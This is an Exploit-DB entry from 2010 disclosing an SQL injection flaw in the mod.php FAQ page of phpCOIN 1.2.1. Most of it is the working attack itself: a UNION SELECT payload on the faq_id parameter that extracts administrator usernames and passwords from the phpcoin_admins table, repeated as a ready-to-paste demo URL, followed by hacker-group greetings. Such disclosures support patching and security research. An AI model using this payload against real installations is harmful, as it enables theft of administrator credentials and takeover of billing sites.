phpCOIN 1.2.1 mod.php - SQL Injection Vulnerability

2010-02-24T00:00:00
ID EDB-ID:11565
Type exploitdb
Reporter BAYBORA
Modified 2010-02-24T00:00:00

Description

phpCOIN v1.2.1 (mod.php) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            phpCOIN 1.2.1 (mod.php) SQL Injection  Vulnerability 
  
###########################
  
Author    : Baybora

Homepage  : http://www.1923turk.com 

Blog      : http://baybora.wordpress.com/ 

Script    : phpCOIN 1.2.1

Download  : http://www.phpcoin.com/
  
###########################  
    
[ Vulnerable File ]

mod.php?mod=faq&mode=show&faq_id= [ SQL ]
     

[ XpL ]
  
-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--


[ Demo]
    
    
http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
    
   
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################